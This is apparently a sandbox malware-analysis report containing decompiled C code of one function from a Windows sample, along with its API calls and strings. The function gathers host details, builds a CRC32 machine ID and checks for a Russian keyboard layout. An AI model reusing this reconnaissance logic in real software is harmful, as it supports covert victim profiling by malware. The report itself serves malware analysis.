                                      control_flow_graph 0 406d90-406da7 1 406da9-406dc8 VirtualAlloc GetUserNameW 0->1 2 406dce-406dd2 0->2 1->2 3 406dd4-406df0 VirtualAlloc GetComputerNameW 2->3 4 406df6-406e00 2->4 3->4 5 406e02-406e17 VirtualAlloc 4->5 6 406e56-406e5a 4->6 5->6 7 406e19-406e2f call 406d10 5->7 8 406e60-406e9a VirtualAlloc RegOpenKeyExW 6->8 9 406ef5-406ef9 6->9 18 406e34-406e36 7->18 13 406e9c-406ebe RegQueryValueExW 8->13 14 406ede-406eef VirtualFree 8->14 10 407024-407028 9->10 11 406eff-406f3b VirtualAlloc * 2 9->11 15 4070d6-4070da 10->15 16 40702e-407068 VirtualAlloc RegOpenKeyExW 10->16 17 406f40-406f73 wsprintfW RegOpenKeyExW 11->17 19 406ec0-406ec7 13->19 20 406ec9 GetLastError 13->20 14->9 27 407134-407138 15->27 28 4070dc-4070fd GetNativeSystemInfo VirtualAlloc 15->28 21 40706a-40708c RegQueryValueExW 16->21 22 4070ac-4070d3 call 406d10 wsprintfW 16->22 23 406fe3-406fe8 17->23 24 406f75-406f95 RegQueryValueExW 17->24 25 406e38-406e3f 18->25 26 406e49-406e4e 18->26 29 406ecf-406edc RegCloseKey 19->29 20->29 30 407097 GetLastError 21->30 31 40708e-407095 21->31 22->15 39 406fed 23->39 32 406fa0 GetLastError 24->32 33 406f97-406f9e 24->33 25->6 36 406e41-406e47 25->36 38 406e51-406e53 wsprintfW 26->38 34 407155-407159 27->34 35 40713a-407150 call 407520 27->35 40 407129 28->40 41 4070ff-407106 28->41 29->9 29->14 43 40709d-4070aa RegCloseKey 30->43 31->43 44 406fa6-406fb3 RegCloseKey 32->44 33->44 46 4072e9 34->46 47 40715f-4071fe VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 34->47 35->34 63 407152 35->63 36->38 38->6 49 406ff0-406ff3 39->49 42 40712e-407131 wsprintfW 40->42 41->40 50 407122-407127 41->50 51 407114-407119 41->51 52 40711b-407120 41->52 53 40710d-407112 41->53 42->27 43->15 43->22 44->23 55 406fb5-406fc5 lstrcmpiW 44->55 56 4072ef-4072f3 46->56 57 407200-407223 RegQueryValueExW 47->57 58 40726d-4072a9 wsprintfW lstrcatW GetModuleHandleW GetProcAddress 47->58 59 406ff5-406ff7 49->59 60 406ffd-406fff 49->60 50->42 51->42 52->42 53->42 64 406fc7-406fe1 wsprintfW 55->64 65 406fea 55->65 66 4074a0-4074a7 56->66 67 4072f9-407340 VirtualAlloc 56->67 68 407225-40722c 57->68 69 40722e GetLastError 57->69 61 4072c7 58->61 62 4072ab-4072c5 lstrlenW 58->62 59->17 59->60 70 407001-40700b wsprintfW 60->70 71 40700e-40701e VirtualFree 60->71 74 4072ce-4072e7 VirtualFree 61->74 62->74 63->34 64->49 65->39 72 4074a9-4074c5 VirtualAlloc 66->72 73 4074ee-4074f9 66->73 75 407345-407350 67->75 76 407234-407241 RegCloseKey 68->76 69->76 70->71 71->10 78 4074e4 72->78 79 4074c7-4074d0 call 4068f0 72->79 74->56 75->75 80 407352-407367 75->80 76->58 81 407243-407268 lstrlenW call 406d10 76->81 78->73 79->73 89 4074d2-4074de VirtualFree 79->89 83 407370-407388 GetDriveTypeW 80->83 81->58 86 40747b 83->86 87 40738e-407391 83->87 88 407481-40748b 86->88 87->86 90 407397-4073de lstrcatW * 3 GetDiskFreeSpaceW 87->90 88->83 91 407491-40749b lstrlenW 88->91 89->78 92 407471-407479 lstrcatW 90->92 93 4073e4-40746f call 408470 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 90->93 91->66 92->86 93->88
                                      C-Code - Quality: 90%
                                      			E00406D90(char* __ecx) {
                                      				WCHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				int _v28;
                                      				int _v32;
                                      				short _v36;
                                      				short _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				signed short _v76;
                                      				char _v132;
                                      				void* _t182;
                                      				long _t183;
                                      				short _t186;
                                      				short _t187;
                                      				short _t188;
                                      				signed int _t189;
                                      				signed int _t194;
                                      				void* _t209;
                                      				signed int _t211;
                                      				signed int _t214;
                                      				WCHAR* _t218;
                                      				WCHAR* _t219;
                                      				long _t228;
                                      				_Unknown_base(*)()* _t233;
                                      				long _t242;
                                      				signed int _t245;
                                      				intOrPtr _t250;
                                      				WCHAR* _t252;
                                      				WCHAR* _t254;
                                      				void* _t263;
                                      				WCHAR* _t269;
                                      				void* _t278;
                                      				WCHAR* _t286;
                                      				void* _t287;
                                      				WCHAR* _t289;
                                      				WCHAR* _t290;
                                      				WCHAR* _t292;
                                      				DWORD* _t296;
                                      				char* _t300;
                                      				short* _t301;
                                      				DWORD* _t307;
                                      				signed int _t310;
                                      				void* _t314;
                                      				char* _t316;
                                      				char* _t318;
                                      				void* _t319;
                                      				void* _t320;
                                      
                                      				_t300 = __ecx;
                                      				_t318 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4);
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 8) = _t292;
                                      					_v28 = 0x100;
                                      					GetUserNameW(_t292, _t300);
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
                                      					_v28 = 0x1e;
                                      					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4);
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 0x14) = _t290;
                                      					GetComputerNameW(_t290, _t300);
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
                                      					L11:
                                      					if( *(_t318 + 0x30) == 0) {
                                      						L18:
                                      						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
                                      							L35:
                                      							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
                                      								L42:
                                      								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
                                      									L51:
                                      									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
                                      										_v32 = 0;
                                      										_t250 = E00407520(_t318 + 0x2c,  &_v32);
                                      										if(_t250 == 0) {
                                      											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
                                      										}
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
                                      										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                      										 *(_t318 + 0x68) = _t218;
                                      										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                      										_v16 = _t219;
                                      										_t81 =  &(_t219[0x306]); // 0x60c
                                      										_v8 = _t81;
                                      										GetWindowsDirectoryW(_t219, 0x100);
                                      										_t300 = _v16;
                                      										_t300[6] = 0;
                                      										_t85 =  &(_t300[0x600]); // 0x600
                                      										_t307 = _t85;
                                      										_t86 =  &(_t300[0x400]); // 0x400
                                      										_v20 = _t307;
                                      										_t88 =  &(_t300[0x604]); // 0x604
                                      										_t89 =  &(_t300[0x608]); // 0x608
                                      										_t90 =  &(_t300[0x200]); // 0x200
                                      										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
                                      										_v24 = 0;
                                      										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
                                      										if(_t228 == 0) {
                                      											_t300 = _v8;
                                      											_v32 = 0x80;
                                      											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
                                      											if(_t242 != 0) {
                                      												GetLastError();
                                      											} else {
                                      												_v24 = 1;
                                      											}
                                      											RegCloseKey(_v28);
                                      											if(_v24 != 0) {
                                      												_t245 = lstrlenW(_v8);
                                      												_t300 = _v8;
                                      												_push(_t300);
                                      												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
                                      											}
                                      										}
                                      										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
                                      										_t320 = _t320 + 0xc;
                                      										lstrcatW( *(_t318 + 0x68), _v8);
                                      										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                      										_v32 = _t233;
                                      										if(_t233 == 0) {
                                      											 *(_t318 + 0x6c) = 0;
                                      										} else {
                                      											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
                                      										}
                                      										 *(_t318 + 0x70) =  *_v20;
                                      										VirtualFree(_v16, 0, 0x8000); // executed
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
                                      										L78:
                                      										if( *(_t318 + 0x80) == 0) {
                                      											L83:
                                      											return 1;
                                      										}
                                      										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                      										 *(_t318 + 0x84) = _t182;
                                      										if(_t182 == 0) {
                                      											L82:
                                      											 *(_t318 + 0x80) = 0;
                                      											goto L83;
                                      										}
                                      										_push(_t300);
                                      										_t183 = E004068F0(_t182);
                                      										if(_t183 != 0) {
                                      											goto L83;
                                      										}
                                      										VirtualFree( *(_t318 + 0x84), _t183, 0x8000);
                                      										goto L82;
                                      									} else {
                                      										_v68 = L"UNKNOWN";
                                      										_v64 = L"NO_ROOT_DIR";
                                      										_v60 = L"REMOVABLE";
                                      										_v56 = L"FIXED";
                                      										_v52 = L"REMOTE";
                                      										_v48 = L"CDROM";
                                      										_v44 = L"RAMDISK";
                                      										 *(_t318 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      										_t301 =  &_v132;
                                      										_t186 = 0x41;
                                      										do {
                                      											 *_t301 = _t186;
                                      											_t301 = _t301 + 2;
                                      											_t186 = _t186 + 1;
                                      										} while (_t186 <= 0x5a);
                                      										_t187 =  *L"?:\\"; // 0x3a003f
                                      										_v40 = _t187;
                                      										_t188 =  *0x40e308; // 0x5c
                                      										_v36 = _t188;
                                      										_t189 = 0;
                                      										_v28 = 0;
                                      										do {
                                      											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
                                      											_t310 = GetDriveTypeW( &_v40);
                                      											if(_t310 > 2 && _t310 != 5) {
                                      												_v36 = 0;
                                      												lstrcatW( *(_t318 + 0x7c),  &_v40);
                                      												_v36 = 0x5c;
                                      												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
                                      												lstrcatW( *(_t318 + 0x7c), "_");
                                      												if(GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20) == 0) {
                                      													lstrcatW( *(_t318 + 0x7c), L"0,");
                                      													goto L75;
                                      												}
                                      												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
                                      												_t296 = _t307;
                                      												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
                                      												_t314 = _v12;
                                      												_v8 = _t314 - _t209;
                                      												asm("sbb eax, edx");
                                      												_v12 = _t296;
                                      												_t211 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_t296);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
                                      												_t214 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_v12);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
                                      												_t320 = _t320 + 0x20;
                                      												lstrcatW( *(_t318 + 0x7c), ",");
                                      											}
                                      											_t189 =  &(1[_v28]);
                                      											_v28 = _t189;
                                      										} while (_t189 < 0x1b);
                                      										_t194 = lstrlenW( *(_t318 + 0x7c));
                                      										_t300 =  *(_t318 + 0x7c);
                                      										_t300[_t194 * 2 - 2] = 0;
                                      										goto L78;
                                      									}
                                      								}
                                      								__imp__GetNativeSystemInfo( &_v76);
                                      								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4);
                                      								_t300 = _v76 & 0x0000ffff;
                                      								 *(_t318 + 0x5c) = _t252;
                                      								if(_t300 > 9) {
                                      									L49:
                                      									_push(L"Unknown");
                                      									L50:
                                      									wsprintfW(_t252, ??);
                                      									_t320 = _t320 + 8;
                                      									goto L51;
                                      								}
                                      								_t300 = _t300[E00407510] & 0x000000ff;
                                      								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
                                      									case 0:
                                      										_push(L"x86");
                                      										goto L50;
                                      									case 1:
                                      										_push(L"ARM");
                                      										goto L50;
                                      									case 2:
                                      										_push(L"Itanium");
                                      										goto L50;
                                      									case 3:
                                      										_push(L"x64");
                                      										goto L50;
                                      									case 4:
                                      										goto L49;
                                      								}
                                      							}
                                      							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4);
                                      							_v20 = _t254;
                                      							 *(_t318 + 0x50) = _t254;
                                      							_v24 = 0;
                                      							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28) != 0) {
                                      								L41:
                                      								_push(_t300);
                                      								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
                                      								wsprintfW( *(_t318 + 0x50), L"error");
                                      								_t320 = _t320 + 8;
                                      								goto L42;
                                      							}
                                      							_v32 = 0x80;
                                      							if(RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32) != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v28);
                                      							if(_v24 != 0) {
                                      								goto L42;
                                      							} else {
                                      								goto L41;
                                      							}
                                      						}
                                      						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4);
                                      						_v16 = _t263;
                                      						_v28 = _t263 + 0xe;
                                      						 *(_t318 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
                                      						_t316 = 1;
                                      						_v8 = 1;
                                      						_v12 = 0;
                                      						do {
                                      							wsprintfW(_v16, L"%d", _t316);
                                      							_t320 = _t320 + 0xc;
                                      							_v24 = 0;
                                      							_t316 =  &(_t316[1]);
                                      							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20) != 0) {
                                      								L27:
                                      								_t269 = 0;
                                      								_v8 = 0;
                                      								L29:
                                      								_t300 = _v12;
                                      								goto L30;
                                      							}
                                      							_v32 = 0x80;
                                      							if(RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32) != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v20);
                                      							if(_v24 == 0) {
                                      								goto L27;
                                      							} else {
                                      								if(lstrcmpiW(_v28, L"00000419") != 0) {
                                      									_t269 = _v8;
                                      									goto L29;
                                      								}
                                      								wsprintfW( *(_t318 + 0x44), "1");
                                      								_t320 = _t320 + 8;
                                      								_t300 = 1;
                                      								_t269 = 0;
                                      								_v12 = 1;
                                      								_v8 = 0;
                                      							}
                                      							L30:
                                      						} while (_t316 != 9 && _t269 != 0);
                                      						if(_t300 == 0) {
                                      							wsprintfW( *(_t318 + 0x44), "0");
                                      							_t320 = _t320 + 8;
                                      						}
                                      						VirtualFree(_v16, 0, 0x8000);
                                      						goto L35;
                                      					}
                                      					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4);
                                      					_v24 = _t278;
                                      					 *(_t318 + 0x38) = _t278;
                                      					_v12 = 0;
                                      					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16) != 0) {
                                      						L17:
                                      						 *(_t318 + 0x30) = 0;
                                      						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
                                      						goto L18;
                                      					}
                                      					_v28 = 0x40;
                                      					if(RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28) != 0) {
                                      						GetLastError();
                                      					} else {
                                      						_v12 = 1;
                                      					}
                                      					RegCloseKey(_v16);
                                      					if(_v12 != 0) {
                                      						goto L18;
                                      					} else {
                                      						goto L17;
                                      					}
                                      				} else {
                                      					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                      					 *(_t318 + 0x20) = _t286;
                                      					if(_t286 == 0) {
                                      						goto L11;
                                      					}
                                      					_push(_t300);
                                      					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
                                      					if(_t287 == 0) {
                                      						wsprintfW( *(_t318 + 0x20), L"undefined");
                                      						L10:
                                      						_t320 = _t320 + 8;
                                      						goto L11;
                                      					}
                                      					_t289 =  *(_t318 + 0x20);
                                      					if( *_t289 != 0) {
                                      						goto L11;
                                      					}
                                      					wsprintfW(_t289, L"WORKGROUP");
                                      					goto L10;
                                      				}
                                      			}


























































                                      0x00406d90
                                      0x00406d9b
                                      0x00406da7
                                      0x00406db7
                                      0x00406db9
                                      0x00406dbc
                                      0x00406dc1
                                      0x00406dc8
                                      0x00406dc8
                                      0x00406dd2
                                      0x00406ddf
                                      0x00406de6
                                      0x00406de8
                                      0x00406deb
                                      0x00406df0
                                      0x00406df0
                                      0x00406e00
                                      0x00406e56
                                      0x00406e5a
                                      0x00406ef5
                                      0x00406ef9
                                      0x00407024
                                      0x00407028
                                      0x004070d6
                                      0x004070da
                                      0x00407134
                                      0x00407138
                                      0x0040713d
                                      0x00407149
                                      0x00407150
                                      0x00407152
                                      0x00407152
                                      0x00407150
                                      0x00407159
                                      0x0040716d
                                      0x0040717d
                                      0x00407180
                                      0x00407188
                                      0x0040718b
                                      0x00407191
                                      0x00407194
                                      0x0040719a
                                      0x004071a4
                                      0x004071a8
                                      0x004071a8
                                      0x004071ae
                                      0x004071b4
                                      0x004071b8
                                      0x004071bf
                                      0x004071cc
                                      0x004071d4
                                      0x004071dd
                                      0x004071f6
                                      0x004071fe
                                      0x00407200
                                      0x00407214
                                      0x0040721b
                                      0x00407223
                                      0x0040722e
                                      0x00407225
                                      0x00407225
                                      0x00407225
                                      0x00407237
                                      0x00407241
                                      0x00407246
                                      0x0040724c
                                      0x0040724f
                                      0x00407268
                                      0x00407268
                                      0x00407241
                                      0x0040727a
                                      0x00407282
                                      0x0040728b
                                      0x0040729e
                                      0x004072a4
                                      0x004072a9
                                      0x004072c7
                                      0x004072ab
                                      0x004072c2
                                      0x004072c2
                                      0x004072da
                                      0x004072e1
                                      0x004072e1
                                      0x004072f3
                                      0x004074a0
                                      0x004074a7
                                      0x004074f0
                                      0x004074f9
                                      0x004074f9
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x00000000
                                      0x004074e4
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x00000000
                                      0x00000000
                                      0x004074de
                                      0x00000000
                                      0x004072f9
                                      0x00407307
                                      0x0040730e
                                      0x00407315
                                      0x0040731c
                                      0x00407323
                                      0x0040732a
                                      0x00407331
                                      0x0040733a
                                      0x0040733d
                                      0x00407340
                                      0x00407345
                                      0x00407345
                                      0x00407348
                                      0x0040734b
                                      0x0040734c
                                      0x00407352
                                      0x00407357
                                      0x0040735a
                                      0x0040735f
                                      0x00407362
                                      0x00407364
                                      0x00407370
                                      0x00407375
                                      0x00407383
                                      0x00407388
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x00407479
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x00000000
                                      0x0040749b
                                      0x004072f3
                                      0x004070e0
                                      0x004070f1
                                      0x004070f3
                                      0x004070f7
                                      0x004070fd
                                      0x00407129
                                      0x00407129
                                      0x0040712e
                                      0x0040712f
                                      0x00407131
                                      0x00000000
                                      0x00407131
                                      0x004070ff
                                      0x00407106
                                      0x00000000
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407114
                                      0x00000000
                                      0x00000000
                                      0x0040711b
                                      0x00000000
                                      0x00000000
                                      0x0040710d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407106
                                      0x0040703c
                                      0x0040703e
                                      0x00407041
                                      0x00407059
                                      0x00407068
                                      0x004070ac
                                      0x004070ac
                                      0x004070c4
                                      0x004070d1
                                      0x004070d3
                                      0x00000000
                                      0x004070d3
                                      0x0040706d
                                      0x0040708c
                                      0x00407097
                                      0x0040708e
                                      0x0040708e
                                      0x0040708e
                                      0x004070a0
                                      0x004070aa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004070aa
                                      0x00406f0d
                                      0x00406f16
                                      0x00406f20
                                      0x00406f25
                                      0x00406f28
                                      0x00406f2d
                                      0x00406f34
                                      0x00406f40
                                      0x00406f49
                                      0x00406f4b
                                      0x00406f4e
                                      0x00406f58
                                      0x00406f73
                                      0x00406fe3
                                      0x00406fe3
                                      0x00406fe5
                                      0x00406fed
                                      0x00406fed
                                      0x00000000
                                      0x00406fed
                                      0x00406f78
                                      0x00406f95
                                      0x00406fa0
                                      0x00406f97
                                      0x00406f97
                                      0x00406f97
                                      0x00406fa9
                                      0x00406fb3
                                      0x00000000
                                      0x00406fb5
                                      0x00406fc5
                                      0x00406fea
                                      0x00000000
                                      0x00406fea
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd4
                                      0x00406fd9
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fde
                                      0x00406ff0
                                      0x00406ff0
                                      0x00406fff
                                      0x00407009
                                      0x0040700b
                                      0x0040700b
                                      0x00407018
                                      0x00000000
                                      0x0040701e
                                      0x00406e6e
                                      0x00406e70
                                      0x00406e73
                                      0x00406e8b
                                      0x00406e9a
                                      0x00406ede
                                      0x00406ee8
                                      0x00406eef
                                      0x00000000
                                      0x00406eef
                                      0x00406e9f
                                      0x00406ebe
                                      0x00406ec9
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ed2
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406e02
                                      0x00406e10
                                      0x00406e12
                                      0x00406e17
                                      0x00000000
                                      0x00000000
                                      0x00406e19
                                      0x00406e2f
                                      0x00406e36
                                      0x00406e51
                                      0x00406e51
                                      0x00406e53
                                      0x00000000
                                      0x00406e53
                                      0x00406e38
                                      0x00406e3f
                                      0x00000000
                                      0x00000000
                                      0x00406e51
                                      0x00000000
                                      0x00406e51

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                      • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                      • GetComputerNameW.KERNEL32 ref: 00406DF0
                                      • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                      • wsprintfW.USER32 ref: 00406E51
                                      • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                      • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                      • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                      • GetLastError.KERNEL32 ref: 00406EC9
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                      • VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
                                      • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
                                      • wsprintfW.USER32 ref: 00406F49
                                      • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
                                      • RegQueryValueExW.ADVAPI32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
                                      • GetLastError.KERNEL32 ref: 00406FA0
                                      • RegCloseKey.ADVAPI32(00404590), ref: 00406FA9
                                      • lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
                                      • wsprintfW.USER32 ref: 00406FCF
                                      • wsprintfW.USER32 ref: 00407009
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407018
                                      • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
                                      • RegQueryValueExW.ADVAPI32(?,productName,00000000,00000000,00404590,?), ref: 00407084
                                      • GetLastError.KERNEL32 ref: 00407097
                                      • RegCloseKey.ADVAPI32(?), ref: 004070A0
                                      • wsprintfW.USER32 ref: 004070D1
                                      • GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
                                      • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
                                      • wsprintfW.USER32 ref: 0040712F
                                      • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0040716D
                                      • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 00407180
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
                                      • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
                                      • RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
                                      • RegQueryValueExW.KERNELBASE(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
                                      • GetLastError.KERNEL32 ref: 0040722E
                                      • RegCloseKey.ADVAPI32(?), ref: 00407237
                                      • lstrlenW.KERNEL32(00000000), ref: 00407246
                                        • Part of subcall function 00406D10: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                        • Part of subcall function 00406D10: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                        • Part of subcall function 00406D10: RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • wsprintfW.USER32 ref: 0040727A
                                      • lstrcatW.KERNEL32(?,00000000), ref: 0040728B
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040729E
                                      • lstrlenW.KERNEL32(?), ref: 004072AE
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
                                      • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                      • API String ID: 2088797152-983031137
                                      • Opcode ID: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
                                      • Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
